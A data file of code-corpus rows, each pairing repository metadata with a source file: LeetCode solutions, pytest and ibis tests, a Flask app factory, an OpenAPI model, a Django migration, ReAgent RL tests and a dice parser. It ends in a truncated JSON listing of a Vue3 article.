a6c0a838c9d08cc5d940f86faa2809284d203636 | e3b9e8ec177e2b4c8bf24bbfefd7b2af4cd51e80 | /search/InitializationError.py | 339256d08a540446ba7de3e7f3b6b667392675c7 | [] | no_license | dmitriyVasilievich1986/radius-logs-parser | cae3ea7aade9ddcdd3b8739e8048a80ee8134d7c | f4d4256dee0c772b06d57acf49e72e742d56996e | refs/heads/main | 2023-06-02T23:26:09.001345 | 2021-06-25T13:00:05 | 2021-06-25T13:00:05 | 379,828,781 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 238 | py | from .Config import V3
class InitializationError(Exception):
def __init__(self, *args, **kwargs):
if V3:
super().__init__(*args, **kwargs)
else:
super(Exception, self).__init__(*args, **kwargs) | [
"dmitriyvasil@gmail.com"
] | dmitriyvasil@gmail.com |
046a2b58fd3c8b67a19b77e17be9792baf525356 | 112882b8d6c5071e7d2610c595bfca9210c79a0a | /tools/leetcode.189.Rotate Array/leetcode.189.Rotate Array.submission6.py | 927e2502fa4eb865d39c018a80d1e268d6be7b85 | [
"MIT"
] | permissive | tedye/leetcode | 193b1900d98e35d5c402013cbe3bc993d0235da2 | 975d7e3b8cb9b6be9e80e07febf4bcf6414acd46 | refs/heads/master | 2021-01-01T19:06:06.408135 | 2015-10-24T06:44:40 | 2015-10-24T06:44:40 | 41,804,923 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 336 | py | class Solution:
# @param nums, a list of integer
# @param k, num of steps
# @return nothing, please modify the nums list in-place.
def rotate(self, nums, k):
if not nums or k == 0:
return
k = len(nums) - k%len(nums)
for i in range(k):
nums.append(nums.pop(0))
| [
"tedye@bu.edu"
] | tedye@bu.edu |
c667278cf860aef9d54dc6dc40e0ec577a621cbe | 21e7753732296bfdfb6dd9a9b58c7c6b8d90a1e5 | /Hard/longestIncreasingSeq/longestIncreasingSeq_test.py | acf4794919c97abea3326458e44a4ef4dad62e8c | [] | no_license | rongfeng-china/python-algorithms-and-data-structures | eb8514b44d7ff97dd7c4deda2d8ea888a5aa8d04 | a69241bb7b684bc7d00acdd46c2fc214f7b61887 | refs/heads/master | 2020-03-13T09:08:13.375870 | 2015-12-11T07:37:30 | 2015-12-11T07:37:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 188 | py | from longestIncreasingSeq import longestIncreasingSeq
import pytest
def test_longestIncreasingSeq():
    """longestIncreasingSeq should return the longest increasing run."""
    arr = [13, 14, 10, 11, 12]
    res = longestIncreasingSeq(arr)
    # Idiom fix: drop the call-style parentheses around the assert
    # expression; `assert(x, msg)` would silently always pass.
    assert res == [10, 11, 12]
| [
"prathamt@outlook.com"
] | prathamt@outlook.com |
b375d115741069c717a9c061d18b42d1de4fda00 | 70bee1e4e770398ae7ad9323bd9ea06f279e2796 | /openapi_client/models/waas_network_controls.py | 3099374b53195c2dcd56ab82bfaefc1258838d85 | [] | no_license | hi-artem/twistlock-py | c84b420b1e582b3c4cf3631eb72dac6d659d4746 | 9888e905f5b9d3cc00f9b84244588c0992f8e4f4 | refs/heads/main | 2023-07-18T07:57:57.705014 | 2021-08-22T04:36:33 | 2021-08-22T04:36:33 | 398,637,698 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,756 | py | # coding: utf-8
"""
Prisma Cloud Compute API
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: 21.04.439
Generated by: https://openapi-generator.tech
"""
try:
from inspect import getfullargspec
except ImportError:
from inspect import getargspec as getfullargspec
import pprint
import re # noqa: F401
import six
from openapi_client.configuration import Configuration
class WaasNetworkControls(object):
    """NOTE: This class is auto generated by OpenAPI Generator.
    Ref: https://openapi-generator.tech
    Do not edit the class manually.
    """
    """
    Attributes:
      openapi_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    # Attribute name -> OpenAPI type name (consumed by to_dict/serializers).
    openapi_types = {
        'advanced_protection_effect': 'WaasEffect',
        'countries': 'WaasAccessControls',
        'exception_subnets': 'list[str]',
        'subnets': 'WaasAccessControls'
    }
    # Attribute name -> JSON key on the wire (camelCase).
    attribute_map = {
        'advanced_protection_effect': 'advancedProtectionEffect',
        'countries': 'countries',
        'exception_subnets': 'exceptionSubnets',
        'subnets': 'subnets'
    }
    def __init__(self, advanced_protection_effect=None, countries=None, exception_subnets=None, subnets=None, local_vars_configuration=None):  # noqa: E501
        """WaasNetworkControls - a model defined in OpenAPI"""  # noqa: E501
        if local_vars_configuration is None:
            local_vars_configuration = Configuration.get_default_copy()
        self.local_vars_configuration = local_vars_configuration
        # Backing fields for the properties below.
        self._advanced_protection_effect = None
        self._countries = None
        self._exception_subnets = None
        self._subnets = None
        self.discriminator = None
        # Only assign provided values so unset fields stay None.
        if advanced_protection_effect is not None:
            self.advanced_protection_effect = advanced_protection_effect
        if countries is not None:
            self.countries = countries
        if exception_subnets is not None:
            self.exception_subnets = exception_subnets
        if subnets is not None:
            self.subnets = subnets
    @property
    def advanced_protection_effect(self):
        """Gets the advanced_protection_effect of this WaasNetworkControls.  # noqa: E501


        :return: The advanced_protection_effect of this WaasNetworkControls.  # noqa: E501
        :rtype: WaasEffect
        """
        return self._advanced_protection_effect
    @advanced_protection_effect.setter
    def advanced_protection_effect(self, advanced_protection_effect):
        """Sets the advanced_protection_effect of this WaasNetworkControls.


        :param advanced_protection_effect: The advanced_protection_effect of this WaasNetworkControls.  # noqa: E501
        :type advanced_protection_effect: WaasEffect
        """
        self._advanced_protection_effect = advanced_protection_effect
    @property
    def countries(self):
        """Gets the countries of this WaasNetworkControls.  # noqa: E501


        :return: The countries of this WaasNetworkControls.  # noqa: E501
        :rtype: WaasAccessControls
        """
        return self._countries
    @countries.setter
    def countries(self, countries):
        """Sets the countries of this WaasNetworkControls.


        :param countries: The countries of this WaasNetworkControls.  # noqa: E501
        :type countries: WaasAccessControls
        """
        self._countries = countries
    @property
    def exception_subnets(self):
        """Gets the exception_subnets of this WaasNetworkControls.  # noqa: E501

        Network lists for which requests completely bypass WAAS checks and protections.  # noqa: E501

        :return: The exception_subnets of this WaasNetworkControls.  # noqa: E501
        :rtype: list[str]
        """
        return self._exception_subnets
    @exception_subnets.setter
    def exception_subnets(self, exception_subnets):
        """Sets the exception_subnets of this WaasNetworkControls.

        Network lists for which requests completely bypass WAAS checks and protections.  # noqa: E501

        :param exception_subnets: The exception_subnets of this WaasNetworkControls.  # noqa: E501
        :type exception_subnets: list[str]
        """
        self._exception_subnets = exception_subnets
    @property
    def subnets(self):
        """Gets the subnets of this WaasNetworkControls.  # noqa: E501


        :return: The subnets of this WaasNetworkControls.  # noqa: E501
        :rtype: WaasAccessControls
        """
        return self._subnets
    @subnets.setter
    def subnets(self, subnets):
        """Sets the subnets of this WaasNetworkControls.


        :param subnets: The subnets of this WaasNetworkControls.  # noqa: E501
        :type subnets: WaasAccessControls
        """
        self._subnets = subnets
    def to_dict(self, serialize=False):
        """Returns the model properties as a dict"""
        result = {}
        # Recursively serialize nested models; models whose to_dict takes
        # only self are called without the serialize flag.
        def convert(x):
            if hasattr(x, "to_dict"):
                args = getfullargspec(x.to_dict).args
                if len(args) == 1:
                    return x.to_dict()
                else:
                    return x.to_dict(serialize)
            else:
                return x
        for attr, _ in six.iteritems(self.openapi_types):
            value = getattr(self, attr)
            # When serializing, emit the JSON (camelCase) key names.
            attr = self.attribute_map.get(attr, attr) if serialize else attr
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: convert(x),
                    value
                ))
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], convert(item[1])),
                    value.items()
                ))
            else:
                result[attr] = convert(value)
        return result
    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())
    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()
    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, WaasNetworkControls):
            return False
        return self.to_dict() == other.to_dict()
    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        if not isinstance(other, WaasNetworkControls):
            return True
        return self.to_dict() != other.to_dict()
| [
"aakatev@virtru.com"
] | aakatev@virtru.com |
b174000a9efc0a2cfcad23ba2a171ed686f20bdf | 97d34d62e4232e754c5f1a458b2d4068abadc1ab | /flask/flasky-master/app/__init__.py | 8438b924c8c21163e6af7b40d38c746c9ee4c1de | [
"MIT"
] | permissive | chenzhenpin/py_test | d0e4ae32ab43fae4da53d0f0ac7d89b77b041a96 | b05ed73210ab7ebdaa39d8ebcf9687d4ef16125c | refs/heads/master | 2022-12-27T10:21:54.114869 | 2018-12-06T02:04:31 | 2018-12-06T02:04:31 | 159,364,911 | 0 | 1 | null | 2022-12-15T14:30:38 | 2018-11-27T16:22:28 | Python | UTF-8 | Python | false | false | 1,256 | py | from flask import Flask
from flask_bootstrap import Bootstrap
from flask_mail import Mail
from flask_moment import Moment
from flask_sqlalchemy import SQLAlchemy
from flask_login import LoginManager
from flask_pagedown import PageDown
from config import config
bootstrap = Bootstrap()
mail = Mail()
moment = Moment()
db = SQLAlchemy()
pagedown = PageDown()
login_manager = LoginManager()
login_manager.session_protection = 'strong'
login_manager.login_view = 'auth.login'
def create_app(config_name):
app = Flask(__name__)
app.config.from_object(config[config_name])
config[config_name].init_app(app)
bootstrap.init_app(app)
mail.init_app(app)
moment.init_app(app)
db.init_app(app)
login_manager.init_app(app)
pagedown.init_app(app)
if not app.debug and not app.testing and not app.config['SSL_DISABLE']:
from flask_sslify import SSLify
sslify = SSLify(app)
from .main import main as main_blueprint
app.register_blueprint(main_blueprint)
from .auth import auth as auth_blueprint
app.register_blueprint(auth_blueprint, url_prefix='/auth')
from .api_1_0 import api as api_1_0_blueprint
app.register_blueprint(api_1_0_blueprint, url_prefix='/api/v1.0')
return app
| [
"1595347682@qq.com"
] | 1595347682@qq.com |
ffd5af4e55a9c62b4108a72d9b8dd7da83f80184 | 5a9c11b0d7d9d1ef11c8404c2e38cf2f5c4c6744 | /myapp/migrations/0002_delete_test.py | 41afe6a17802a63e3ce82c28b340021dfa556f12 | [] | no_license | tlaboni-ecl/Demo_project | 7c671498c8f0f65520552c884b274cbbd2aea47c | 9ed5427d504e830df65ec1e8b17f218feb92ad83 | refs/heads/main | 2022-12-20T17:08:58.545689 | 2020-10-17T20:19:52 | 2020-10-17T20:19:52 | 304,962,116 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 280 | py | # Generated by Django 2.1.5 on 2020-10-17 06:00
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('myapp', '0001_initial'),
]
operations = [
migrations.DeleteModel(
name='test',
),
]
| [
"you@domain.com"
] | you@domain.com |
cc9fc4571d0de756eca3429627552998a832d55c | 2ce71cf8b2ab41b5ad26dbcb9b6cc5b8d27e632d | /ibis/pandas/tests/test_udf.py | 9a580c7e8331f1e32dc2db56ba648e0e41c4e422 | [
"Apache-2.0"
] | permissive | brandonwillard/ibis | 6f1341687df7bb15db7c655f0c7697efeb86357e | 93cc4ba8703a96e19660255e6e48e66d7cd69b31 | refs/heads/master | 2020-03-13T17:08:48.066938 | 2018-04-25T20:09:34 | 2018-04-25T20:09:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,444 | py | import pytest
import numpy as np
import pandas as pd
import pandas.util.testing as tm
import ibis
import ibis.expr.types as ir
import ibis.expr.datatypes as dt
from ibis.pandas.udf import udf, udaf, nullable
from ibis.pandas.dispatch import pause_ordering
with pause_ordering():
@udf(input_type=[dt.string], output_type=dt.int64)
def my_string_length(series, **kwargs):
return series.str.len() * 2
@udaf(input_type=[dt.string], output_type=dt.int64)
def my_string_length_sum(series, **kwargs):
return (series.str.len() * 2).sum()
@udaf(input_type=[dt.double, dt.double], output_type=dt.double)
def my_corr(lhs, rhs, **kwargs):
return lhs.corr(rhs)
@udf([dt.double], dt.double)
def add_one(x):
return x + 1.0
@udf([dt.double], dt.double)
def times_two(x, scope=None):
return x * 2.0
def test_udf():
df = pd.DataFrame({'a': list('abc')})
con = ibis.pandas.connect({'df': df})
t = con.table('df')
expr = my_string_length(t.a)
assert isinstance(expr, ir.ColumnExpr)
result = expr.execute()
expected = t.a.execute().str.len().mul(2)
tm.assert_series_equal(result, expected)
def test_udaf():
df = pd.DataFrame({'a': list('cba')})
con = ibis.pandas.connect({'df': df})
t = con.table('df')
expr = my_string_length_sum(t.a)
assert isinstance(expr, ir.ScalarExpr)
result = expr.execute()
expected = t.a.execute().str.len().mul(2).sum()
assert result == expected
def test_udaf_in_groupby():
df = pd.DataFrame({
'a': np.arange(4, dtype=float).tolist() + np.random.rand(3).tolist(),
'b': np.arange(4, dtype=float).tolist() + np.random.rand(3).tolist(),
'key': list('ddeefff')})
con = ibis.pandas.connect({'df': df})
t = con.table('df')
expr = t.groupby(t.key).aggregate(my_corr=my_corr(t.a, t.b))
assert isinstance(expr, ir.TableExpr)
result = expr.execute().sort_values('key')
dfi = df.set_index('key')
expected = pd.DataFrame({
'key': list('def'),
'my_corr': [
dfi.loc[value, 'a'].corr(dfi.loc[value, 'b']) for value in 'def'
]
})
columns = ['key', 'my_corr']
tm.assert_frame_equal(result[columns], expected[columns])
def test_nullable():
t = ibis.table([('a', 'int64')])
assert nullable(t.a.type()) == (type(None),)
@pytest.mark.xfail(
raises=AssertionError, reason='Nullability is not propagated')
def test_nullable_non_nullable_field():
t = ibis.table([('a', dt.String(nullable=False))])
assert nullable(t.a.type()) == ()
def test_udaf_parameter_mismatch():
with pytest.raises(Exception):
@udaf(input_type=[dt.double], output_type=dt.double)
def my_corr(lhs, rhs, **kwargs):
pass
def test_udf_parameter_mismatch():
with pytest.raises(Exception):
@udf(input_type=[], output_type=dt.double)
def my_corr2(lhs, **kwargs):
return 1.0
def test_call_multiple_udfs():
df = pd.DataFrame({
'a': np.arange(4, dtype=float).tolist() + np.random.rand(3).tolist(),
'b': np.arange(4, dtype=float).tolist() + np.random.rand(3).tolist(),
'key': list('ddeefff')})
con = ibis.pandas.connect({'df': df})
t = con.table('df')
expr = times_two(add_one(t.a))
result = expr.execute()
expected = df.a.add(1.0).mul(2.0)
tm.assert_series_equal(expected, result)
| [
"cpcloud@gmail.com"
] | cpcloud@gmail.com |
9b22f1b8a901bd7097257f0ce01b711698201d5b | a6fa311aff9a99ad6a47e41fe34f3f12bb507007 | /reagent/test/gridworld/test_gridworld_pytorch.py | ee5afe6e37f0a158e0ef29191e97d2229a700519 | [
"BSD-3-Clause"
] | permissive | cts198859/ReAgent | 222e9dd4aeba455ad5faa9f6178a0e9793cb82fc | 20f3d333821bad364fd567cce97de51c44123484 | refs/heads/master | 2022-09-15T13:08:24.732208 | 2020-05-29T00:51:35 | 2020-05-29T00:54:45 | 267,776,326 | 0 | 0 | BSD-3-Clause | 2020-05-29T05:51:43 | 2020-05-29T05:51:43 | null | UTF-8 | Python | false | false | 15,477 | py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.
import os
import random
import tempfile
import unittest
import numpy as np
import reagent.models as models
import reagent.types as rlt
import torch
from reagent.parameters import (
DiscreteActionModelParameters,
NormalizationData,
RainbowDQNParameters,
RLParameters,
TrainingParameters,
)
from reagent.prediction.dqn_torch_predictor import DiscreteDqnTorchPredictor
from reagent.prediction.predictor_wrapper import (
DiscreteDqnPredictorWrapper,
DiscreteDqnWithPreprocessor,
)
from reagent.preprocessing.normalization import get_num_output_features
from reagent.preprocessing.preprocessor import Preprocessor
from reagent.test.gridworld.gridworld import Gridworld
from reagent.test.gridworld.gridworld_base import DISCOUNT, Samples
from reagent.test.gridworld.gridworld_evaluator import GridworldEvaluator
from reagent.test.gridworld.gridworld_test_base import GridworldTestBase
from reagent.torch_utils import export_module_to_buffer
from reagent.training.c51_trainer import C51Trainer, C51TrainerParameters
from reagent.training.dqn_trainer import DQNTrainer, DQNTrainerParameters
from reagent.training.qrdqn_trainer import QRDQNTrainer, QRDQNTrainerParameters
class TestGridworld(GridworldTestBase):
def setUp(self):
self.minibatch_size = 512
np.random.seed(0)
random.seed(0)
torch.manual_seed(0)
super().setUp()
def get_sarsa_parameters(
self, environment, reward_shape, dueling, categorical, quantile, clip_grad_norm
):
rl_parameters = RLParameters(
gamma=DISCOUNT,
target_update_rate=1.0,
maxq_learning=False,
reward_boost=reward_shape,
)
training_parameters = TrainingParameters(
layers=[-1, 128, -1] if dueling else [-1, -1],
activations=["relu", "relu"] if dueling else ["linear"],
minibatch_size=self.minibatch_size,
learning_rate=0.05,
optimizer="ADAM",
clip_grad_norm=clip_grad_norm,
)
return DiscreteActionModelParameters(
actions=environment.ACTIONS,
rl=rl_parameters,
training=training_parameters,
rainbow=RainbowDQNParameters(
double_q_learning=True,
dueling_architecture=dueling,
categorical=categorical,
quantile=quantile,
num_atoms=5,
),
)
def get_modular_sarsa_trainer(
self,
environment,
dueling,
categorical,
quantile,
use_gpu=False,
use_all_avail_gpus=False,
clip_grad_norm=None,
):
return self.get_modular_sarsa_trainer_reward_boost(
environment,
{},
dueling=dueling,
categorical=categorical,
quantile=quantile,
use_gpu=use_gpu,
use_all_avail_gpus=use_all_avail_gpus,
clip_grad_norm=clip_grad_norm,
)
def get_modular_sarsa_trainer_reward_boost(
self,
environment,
reward_shape,
dueling,
categorical,
quantile,
use_gpu=False,
use_all_avail_gpus=False,
clip_grad_norm=None,
):
assert not quantile or not categorical
parameters = self.get_sarsa_parameters(
environment, reward_shape, dueling, categorical, quantile, clip_grad_norm
)
state_normalization_parameters = environment.normalization
def make_dueling_dqn(num_atoms=None):
return models.DuelingQNetwork.make_fully_connected(
state_dim=get_num_output_features(state_normalization_parameters),
action_dim=len(environment.ACTIONS),
layers=parameters.training.layers[1:-1],
activations=parameters.training.activations[:-1],
num_atoms=num_atoms,
)
if quantile:
if dueling:
q_network = make_dueling_dqn(num_atoms=parameters.rainbow.num_atoms)
else:
q_network = models.FullyConnectedDQN(
state_dim=get_num_output_features(state_normalization_parameters),
action_dim=len(environment.ACTIONS),
num_atoms=parameters.rainbow.num_atoms,
sizes=parameters.training.layers[1:-1],
activations=parameters.training.activations[:-1],
)
elif categorical:
assert not dueling
distributional_network = models.FullyConnectedDQN(
state_dim=get_num_output_features(state_normalization_parameters),
action_dim=len(environment.ACTIONS),
num_atoms=parameters.rainbow.num_atoms,
sizes=parameters.training.layers[1:-1],
activations=parameters.training.activations[:-1],
)
q_network = models.CategoricalDQN(
distributional_network,
qmin=-100,
qmax=200,
num_atoms=parameters.rainbow.num_atoms,
)
else:
if dueling:
q_network = make_dueling_dqn()
else:
q_network = models.FullyConnectedDQN(
state_dim=get_num_output_features(state_normalization_parameters),
action_dim=len(environment.ACTIONS),
sizes=parameters.training.layers[1:-1],
activations=parameters.training.activations[:-1],
)
q_network_cpe, q_network_cpe_target, reward_network = None, None, None
if parameters.evaluation and parameters.evaluation.calc_cpe_in_training:
q_network_cpe = models.FullyConnectedDQN(
state_dim=get_num_output_features(state_normalization_parameters),
action_dim=len(environment.ACTIONS),
sizes=parameters.training.layers[1:-1],
activations=parameters.training.activations[:-1],
)
q_network_cpe_target = q_network_cpe.get_target_network()
reward_network = models.FullyConnectedDQN(
state_dim=get_num_output_features(state_normalization_parameters),
action_dim=len(environment.ACTIONS),
sizes=parameters.training.layers[1:-1],
activations=parameters.training.activations[:-1],
)
if use_gpu:
q_network = q_network.cuda()
if parameters.evaluation.calc_cpe_in_training:
reward_network = reward_network.cuda()
q_network_cpe = q_network_cpe.cuda()
q_network_cpe_target = q_network_cpe_target.cuda()
if use_all_avail_gpus and not categorical:
q_network = q_network.get_distributed_data_parallel_model()
reward_network = reward_network.get_distributed_data_parallel_model()
q_network_cpe = q_network_cpe.get_distributed_data_parallel_model()
q_network_cpe_target = (
q_network_cpe_target.get_distributed_data_parallel_model()
)
if quantile:
parameters = QRDQNTrainerParameters.from_discrete_action_model_parameters(
parameters
)
trainer = QRDQNTrainer(
q_network,
q_network.get_target_network(),
parameters,
use_gpu,
reward_network=reward_network,
q_network_cpe=q_network_cpe,
q_network_cpe_target=q_network_cpe_target,
)
elif categorical:
parameters = C51TrainerParameters.from_discrete_action_model_parameters(
parameters
)
trainer = C51Trainer(
q_network, q_network.get_target_network(), parameters, use_gpu
)
else:
parameters = DQNTrainerParameters.from_discrete_action_model_parameters(
parameters
)
trainer = DQNTrainer(
q_network,
q_network.get_target_network(),
reward_network,
parameters,
use_gpu,
q_network_cpe=q_network_cpe,
q_network_cpe_target=q_network_cpe_target,
)
return trainer
def get_trainer(
self,
environment,
reward_shape,
dueling,
categorical,
quantile,
use_gpu=False,
use_all_avail_gpus=False,
clip_grad_norm=None,
):
trainer = self.get_modular_sarsa_trainer_reward_boost(
environment,
reward_shape,
dueling=dueling,
categorical=categorical,
quantile=quantile,
use_gpu=use_gpu,
use_all_avail_gpus=use_all_avail_gpus,
clip_grad_norm=clip_grad_norm,
)
return trainer
def get_predictor(self, trainer, environment):
state_normalization_parameters = environment.normalization
state_preprocessor = Preprocessor(state_normalization_parameters, False)
q_network = trainer.q_network
if isinstance(trainer, QRDQNTrainer):
class _Mean(torch.nn.Module):
def forward(self, input):
assert input.ndim == 3
return input.mean(dim=2)
q_network = models.Sequential(q_network, _Mean())
dqn_with_preprocessor = DiscreteDqnWithPreprocessor(
q_network.cpu_model().eval(), state_preprocessor
)
serving_module = DiscreteDqnPredictorWrapper(
dqn_with_preprocessor=dqn_with_preprocessor,
action_names=environment.ACTIONS,
)
predictor = DiscreteDqnTorchPredictor(serving_module)
return predictor
def _test_evaluator_ground_truth(
self,
dueling=False,
categorical=False,
quantile=False,
use_gpu=False,
use_all_avail_gpus=False,
clip_grad_norm=None,
):
environment = Gridworld()
evaluator = GridworldEvaluator(environment, False, DISCOUNT)
trainer = self.get_trainer(
environment,
{},
dueling=dueling,
categorical=categorical,
quantile=quantile,
use_gpu=use_gpu,
use_all_avail_gpus=use_all_avail_gpus,
clip_grad_norm=clip_grad_norm,
)
self.evaluate_gridworld(environment, evaluator, trainer, use_gpu)
def test_evaluator_ground_truth_no_dueling_modular(self):
self._test_evaluator_ground_truth()
@unittest.skipIf(not torch.cuda.is_available(), "CUDA not available")
def test_evaluator_ground_truth_no_dueling_gpu_modular(self):
self._test_evaluator_ground_truth(use_gpu=True)
def test_evaluator_ground_truth_dueling_modular(self):
self._test_evaluator_ground_truth(dueling=True)
@unittest.skipIf(not torch.cuda.is_available(), "CUDA not available")
def test_evaluator_ground_truth_dueling_gpu_modular(self):
self._test_evaluator_ground_truth(dueling=True, use_gpu=True)
def test_evaluator_ground_truth_categorical_modular(self):
self._test_evaluator_ground_truth(categorical=True)
@unittest.skipIf(not torch.cuda.is_available(), "CUDA not available")
def test_evaluator_ground_truth_categorical_gpu_modular(self):
self._test_evaluator_ground_truth(categorical=True, use_gpu=True)
def test_evaluator_ground_truth_quantile_modular(self):
self._test_evaluator_ground_truth(quantile=True)
@unittest.skipIf(not torch.cuda.is_available(), "CUDA not available")
def test_evaluator_ground_truth_quantile_gpu_modular(self):
self._test_evaluator_ground_truth(quantile=True, use_gpu=True)
def test_evaluator_ground_truth_dueling_quantile_modular(self):
self._test_evaluator_ground_truth(dueling=True, quantile=True)
@unittest.skipIf(not torch.cuda.is_available(), "CUDA not available")
def test_evaluator_ground_truth_dueling_quantile_gpu_modular(self):
self._test_evaluator_ground_truth(dueling=True, quantile=True, use_gpu=True)
def _test_reward_boost(self, use_gpu=False, use_all_avail_gpus=False):
environment = Gridworld()
reward_boost = {"L": 100, "R": 200, "U": 300, "D": 400}
trainer = self.get_trainer(
environment,
reward_boost,
dueling=False,
categorical=False,
quantile=False,
use_gpu=use_gpu,
use_all_avail_gpus=use_all_avail_gpus,
)
evaluator = GridworldEvaluator(
env=environment, assume_optimal_policy=False, gamma=DISCOUNT
)
self.evaluate_gridworld(environment, evaluator, trainer, use_gpu)
def test_reward_boost_modular(self):
self._test_reward_boost()
@unittest.skipIf(not torch.cuda.is_available(), "CUDA not available")
def test_reward_boost_gpu_modular(self):
self._test_reward_boost(use_gpu=True)
def test_predictor_torch_export(self):
"""Verify that q-values before model export equal q-values after
model export. Meant to catch issues with export logic."""
environment = Gridworld()
samples = Samples(
mdp_ids=["0"],
sequence_numbers=[0],
sequence_number_ordinals=[1],
states=[{0: 1.0, 1: 1.0, 2: 1.0, 3: 1.0, 4: 1.0, 5: 1.0, 15: 1.0, 24: 1.0}],
actions=["D"],
action_probabilities=[0.5],
rewards=[0],
possible_actions=[["R", "D"]],
next_states=[{5: 1.0}],
next_actions=["U"],
terminals=[False],
possible_next_actions=[["R", "U", "D"]],
)
tdps = environment.preprocess_samples(samples, 1)
assert len(tdps) == 1, "Invalid number of data pages"
trainer = self.get_trainer(environment, {}, False, False, False)
input = rlt.FeatureData(tdps[0].states)
pre_export_q_values = trainer.q_network(input).detach().numpy()
state_normalization_parameters = environment.normalization
preprocessor = Preprocessor(state_normalization_parameters, False)
cpu_q_network = trainer.q_network.cpu_model()
cpu_q_network.eval()
dqn_with_preprocessor = DiscreteDqnWithPreprocessor(cpu_q_network, preprocessor)
serving_module = DiscreteDqnPredictorWrapper(
dqn_with_preprocessor, action_names=environment.ACTIONS
)
with tempfile.TemporaryDirectory() as tmpdirname:
buf = export_module_to_buffer(serving_module)
tmp_path = os.path.join(tmpdirname, "model")
with open(tmp_path, "wb") as f:
f.write(buf.getvalue())
f.close()
predictor = DiscreteDqnTorchPredictor(torch.jit.load(tmp_path))
post_export_q_values = predictor.predict([samples.states[0]])
for i, action in enumerate(environment.ACTIONS):
self.assertAlmostEqual(
float(pre_export_q_values[0][i]),
float(post_export_q_values[0][action]),
places=4,
)
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
5fad363ab88211dc685ce0fcd8f0c3dfbf84edfd | fb6e7922df3da2e9cdc37a00150d6d7663e907ff | /environment/rtfm/dynamics/dice.py | fbc50b78c60b350d2271d13d50dffc0476ae6757 | [
"Apache-2.0"
] | permissive | Spiph/GTG | c54a587002c42a032c89e8eceb5ec638f6c8c05f | 4a45032290d0c1364e4398684582c51094b245f5 | refs/heads/main | 2023-09-02T14:44:14.946624 | 2021-10-27T12:29:05 | 2021-10-27T12:29:05 | 393,086,007 | 0 | 0 | Apache-2.0 | 2021-08-05T15:09:07 | 2021-08-05T15:09:07 | null | UTF-8 | Python | false | false | 2,034 | py | # Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
import random
class Dice:
def __init__(self):
pass
def roll(self):
raise NotImplementedError()
def describe(self):
raise NotImplementedError()
@classmethod
def from_str(cls, s):
dice = []
for sub in s.split('+'):
sub = sub.strip()
if 'd' not in sub:
constant = int(sub)
dice.append(ConstantDice(constant))
else:
splits = sub.split('d')
if len(splits) == 1:
num = 1
max_roll = splits[0]
elif len(splits) == 2:
num, max_roll = splits
if num == '':
num = 1
else:
raise Exception('could not parse dice string {} in main dice string {}'.format(sub, s))
dice.extend([SingleDice(max=int(max_roll)) for _ in range(int(num))])
return SumDice(dice) if len(dice) > 1 else dice[0]
class ConstantDice(Dice):
def __init__(self, constant):
super().__init__()
self.constant = self.max = constant
def roll(self):
return self.constant
def describe(self):
return repr(self.constant)
class SingleDice(Dice):
def __init__(self, max=20):
super().__init__()
self.max = max
def roll(self):
return random.randint(1, self.max)
def describe(self):
return 'd{}'.format(self.max)
class SumDice(Dice):
def __init__(self, subdice):
super().__init__()
self.sub = subdice
@property
def max(self):
return sum(d.max for d in self.sub)
def roll(self):
return sum(d.roll() for d in self.sub)
def describe(self):
return ' + '.join([d.describe() for d in self.sub])
| [
"jzyjiangzhengyao@gmail.com"
] | jzyjiangzhengyao@gmail.com |
499b4e1d8e1b2d32fea99ccda7428930a2633d1c | 3d7039903da398ae128e43c7d8c9662fda77fbdf | /database/Vue.js/juejin_1689.py | b0dda920b43dd2ae496c60a944c794d487f62220 | [] | no_license | ChenYongChang1/spider_study | a9aa22e6ed986193bf546bb567712876c7be5e15 | fe5fbc1a5562ff19c70351303997d3df3af690db | refs/heads/master | 2023-08-05T10:43:11.019178 | 2021-09-18T01:30:22 | 2021-09-18T01:30:22 | 406,727,214 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 67,153 | py | {"err_no": 0, "err_msg": "success", "data": [{"article_id": "6882680744569733133", "article_info": {"article_id": "6882680744569733133", "user_id": "676954895026318", "category_id": "6809637767543259144", "tag_ids": [6809640369764958215], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "Vue3 新特性浅析", "brief_content": "Vue鼓励我们将UI和UI的行为封装到组件中,通过嵌套组件来构建我们的App。但是存在这样的一种情景,有多个子组件从逻辑上看是属于同一个父组件的,但是从技术实现的角度来看,多个子组件可能应挂载在DOM的不同位置,比较常见的情景是Modal。在Vue3之前,我们可以参考下Elem…", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1602499085", "mtime": "1602561678", "rtime": "1602561678", "draft_id": "6882659694356201485", "view_count": 3374, "collect_count": 4, "digg_count": 5, "comment_count": 0, "hot_index": 173, "is_hot": 0, "rank_index": 0.00143742, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "676954895026318", "user_name": "yangcrazy30", "company": "爱奇艺", "job_title": "前端工程师", "avatar_large": "https://sf6-ttcdn-tos.pstatp.com/img/user-avatar/44ee17d1299ec0c7d3ee08b70e844440~300x300.image", "level": 2, "description": "", "followee_count": 26, "follower_count": 5, "post_article_count": 15, "digg_article_count": 28, "got_digg_count": 52, "got_view_count": 7424, "post_shortmsg_count": 0, 